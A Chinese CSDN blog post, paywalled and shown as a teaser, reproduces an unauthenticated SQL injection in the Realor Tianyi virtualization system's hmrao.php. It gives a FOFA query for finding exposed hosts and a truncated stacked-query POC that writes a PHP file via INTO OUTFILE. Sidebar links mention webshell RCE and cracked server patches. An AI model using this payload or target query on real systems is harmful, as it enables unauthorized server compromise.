瑞友天翼应用虚拟化系统SQL注入漏洞复现

已于 2024-05-17 16:46:15 修改
阅读量345 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全
于 2024-05-15 17:47:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l1593572468/article/details/138916690
版权
漏洞复现 专栏收录该内容
39 篇文章 20 订阅 ¥9.90 ¥99.00
订阅专栏
本文介绍了瑞友天翼应用虚拟化系统中hmrao.php接口存在的SQL注入漏洞,详细阐述了漏洞复现过程,包括POC构造和执行,以及如何利用该漏洞控制服务器系统。同时,给出了修复建议,提醒用户联系厂商获取修复补丁。
摘要由CSDN通过智能技术生成

简介

瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权,基于服务器计算(Server-based Computing)架构的应用虚拟化平台。其hmrao.php接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用攻击者可以利用SQL注入漏洞执行命令,进而控制服务器系统。

漏洞复现

FOFA语法:

app="REALOR-天翼应用虚拟化系统"

访问界面内容返回页面如下所示:

POC:

/hmrao.php?s=/Admin/appsave&appid=1%27);select%200x3c3f70687020706870696e666f28293b3f3e%20into%20outfile%20%27C:\\Program%20Files%20(x8

了解本专栏 订阅专栏 解锁全文
Cheng-Ling
关注
专栏目录
订阅专栏
瑞友天翼应用虚拟化系统RCE漏洞复现+利用
0xSec
04-18 2万+
瑞友天翼应用虚拟化系统存在远程代码执行漏洞,未经身份认证的远程攻击者可以利用该漏洞在目标系统上执行任意代码,(该漏洞是通过SQL注入写入后门文件进行代码执行)。
瑞友天翼应用虚拟化系统(GWT)V6.0服务器端和谐补丁
06-29
瑞友天翼应用虚拟化系统(GWT)V6.0是一款高效的企业级软件解决方案,旨在将应用程序的运行和管理从本地设备上移至云端,从而实现远程访问、集中管理和优化资源分配。这款系统的核心是将应用软件转化为可以通过网络...
瑞友天翼应用虚拟化系统SQL注入致远程代码执行漏洞复现
0xSec
05-07 1617
瑞友天翼应用虚拟化系统中的 \Home\Controller\AdminController 存在 appsave/appdel 两个无需鉴权并且存在SQL注入的风险的接口,攻击者可利用 php PDO默认支持堆叠的方式使用堆叠写入恶意文件导致 RCE。
瑞友天翼应用虚拟化系统存在远程代码执行漏洞
nnn2188185的博客
04-19 1143
西安瑞友信息技术资讯有限公司是专业从事虚拟化及云计算解决方案提供商。瑞友天翼应用虚拟化系统存在远程代码执行漏洞,攻击者可以利用此漏洞获WEB主机权限。
漏洞复现瑞友应用虚拟化系统 SQL注入
失心少年
08-29 826
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!瑞友天翼应用虚拟化系统(GWT System)是国内具有自主知识产权的应用虚拟化平台,是基于服务器计算(Server-based Computing)的应用虚拟化平台。
0day-瑞友应用虚拟化系统-AgentBoard-rce命令执行漏洞
weixin_43167326的博客
03-24 1038
瑞友天翼应用虚拟化系统(GWT System)是一款国内具有自主知识产权的应用虚拟化平台,它基于服务器计算技术,致力于为用户提供集中、便捷、安全、高效的虚拟化支撑平台。该系统将用户所有的应用软件(如ERP、OA、CRM等)集中部署在天翼服务器上,客户端只需通过WEB即可快速安全地访问经服务器授权的应用软件,实现集中应用、远程接入和协同办公等功能。同时,瑞友天翼应用虚拟化系统还采用了独特的RAP协议,确保用户能够在任何时间、任何地点,利用任何设备快速访问服务器上的应用软件。
瑞友天翼应用虚拟化系统6.0
07-31
瑞友天翼应用虚拟化系统6.0详解》 瑞友天翼应用虚拟化系统6.0是一款高效的企业级应用发布与管理平台,旨在解决企业内部应用部署、访问及管理的问题,尤其适用于多终端、远程办公以及分布式企业环境。这款系统通过...
瑞友天翼应用虚拟化系统6.0软注册配置工具
07-31
瑞友天翼应用虚拟化系统6.0是一款高效的企业级软件解决方案,旨在提供远程访问、应用发布和资源管理服务。该系统的核心理念是通过虚拟化技术将应用程序从硬件上分离出来,让用户能够在任何时间、任何地点,只要网络...
瑞友天翼应用虚拟化系统(GWT)V7.0服务器端和谐补丁
06-29
瑞友天翼应用虚拟化系统(GWT)V7.0是一款专为企事业单位设计的高效、安全应用交付平台。该系统基于应用虚拟化技术,旨在解决远程访问、多终端兼容性、网络延迟等问题,为企业提供无缝的应用部署和管理解决方案。 ...
瑞友天翼2024SQL注入漏洞poc
02-27
标题中的“瑞友天翼2024SQL注入漏洞poc”指的是瑞友天翼2024版本存在SQL注入漏洞,而POC(Proof of Concept)是指概念验证,通常是一个简单的程序或脚本,用于证明某个安全漏洞确实存在。在网络安全领域,POC是黑客...
瑞友天翼应用虚拟化系统 多处SQL 注入漏洞复现(可RCE)
0xSec
12-15 1485
瑞友天翼应用虚拟化系统存在多处SQL注入漏洞,未经身份认证的远程攻击者可以利用该漏洞在目标系统写入Webshell执行任意代码。
瑞友天翼应用虚拟化系统SQL注入漏洞
一个努力学习网安的小牛马
05-09 1006
瑞友天翼应用虚拟化系统是基于服务器计算架构的应用虚拟化平台,它将用户各种应用软件集中部署到瑞友天翼服务集群,客户端通过 WEB 即可访问经服务器上授权的应用软件,实现集中应用、远程接入、协同办公等。瑞友天翼应用虚拟化系统中的 /Home/Controller/AdminController 存在 appsave/appdel 两个无需鉴权并且存在SQL注入的风险的接口,攻击者可利用 php PDO默认支持堆叠的方式使用堆叠写入恶意文件导致 RCE。
漏洞复现瑞友天翼应用虚拟化系统-SQL注入-ConsoleExternalApi.XGI
最新发布
知黑而守白
06-19 1115
瑞友天翼虚拟化系统是一种基于虚拟化技术的系统,旨在提高硬件资源利用率和灵活性,降低成本,提高效率,适用于各种规模的企业和组织。瑞友天翼虚拟化系统ConsoleExternalApi.XGI接口处存在SQL注入漏洞,恶意攻击者可能会利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失。
瑞友天翼应用虚拟化系统ConsoleExternalApi.XGI接口SQL注入
weixin_43567873的博客
03-04 268
瑞友天翼应用虚拟化系统ConsoleExternalApi.XGI接口SQL注入
Goby 漏洞更新 | 瑞友天翼应用虚拟化系统 index.php 文件远程代码执行漏洞
m0_46699477的博客
04-11 1380
瑞友天翼应用虚拟化系统远程代码执行漏洞情报(0day),攻击者可以通过该漏洞执行任意代码,导致系统被攻击与控制。瑞友天翼应用虚拟化系统是基于服务器计算架构的应用虚拟化平台,它将用户各种应用软件集中部署到瑞友天翼服务集群,客户端通过WEB即可访问经服务器上授权的应用软件,实现集中应用、远程接入、协同办公等。攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
瑞友天翼2024SQL注入漏洞
weixin_44217321的博客
02-28 595
将用户所有应用软件集中部署在天翼服务器,客户端通过WEB即可快速安全的访问经服务器上授权的应用软件,实现集中应用、远程接入、协同办公等。操作终端无需再安装应用程序,通过RAP 协议(Remote Application Protocol),可让用户快速访问服务器上的各类应用软件;RAP 协议只传输鼠标、键盘及屏幕变化的矢量数据,用户不再受客户端和连接性能要求的限制,达到在任何时间、任何地点,利用任何设备、任何网络连接方式均可高效安全地访问服务器(群)上的应用程序和关键资源。文章置顶连接下载。
Goby 漏洞更新 | 瑞友天翼应用虚拟化系统 index(1),字节Golang面试必问
2401_84240431的博客
04-17 471
瑞友天翼应用虚拟化系统远程代码执行漏洞情报(0day),攻击者可以通过该漏洞执行任意代码,导致系统被攻击与控制。瑞友天翼应用虚拟化系统是基于服务器计算架构的应用虚拟化平台,它将用户各种应用软件集中部署到瑞友天翼服务集群,客户端通过WEB即可访问经服务器上授权的应用软件,实现集中应用、远程接入、协同办公等。攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
瑞友虚拟化征文---瑞友天翼应用虚拟化之实战演示
weixin_33754065的博客
10-30 225
瑞友虚拟化征文---瑞友天翼应用虚拟化之实战演示 前面已经介绍了服务器以及客户端的部署,今天我们来实验使用一下,看用户体验如何以及安全性怎么样! 打开客户端的虚拟化客户端,登陆账号,显示了已经被分配的程序,如图,可以看到,我们已经分配了一个QQ的程序出来, ...
应用虚拟化系统远程代码执行
蚁景网安学院
04-25 1508
漏洞简介  微步在线漏洞团队通过“X漏洞奖励计划”获取到瑞友天翼应用虚拟化系统远程代码执行漏洞情报(0day),攻击者可以通过该漏洞执行任意代码,导致系统被攻击与控制。瑞友天翼应用虚拟化系统是基于服务器计算架构的应用虚拟化平台,它将用户各种应用软件集中部署到瑞友天翼服务集群,客户端通过WEB即可访问经服务器上授权的应用软件,实现集中应用、远程接入、协同办公等。  漏洞是因为未授权接口在接收参数时没...
瑞友天翼应用虚拟化系统快速部署指南
瑞友天翼快速部署手册是针对瑞友天翼应用虚拟化系统的详细指南,由西安瑞友信息技术资讯有限公司编写,旨在帮助用户高效地安装和配置这一系统。该手册包含了服务器和客户端的硬件与软件需求,以及系统环境的设置步骤...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cheng-Ling

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值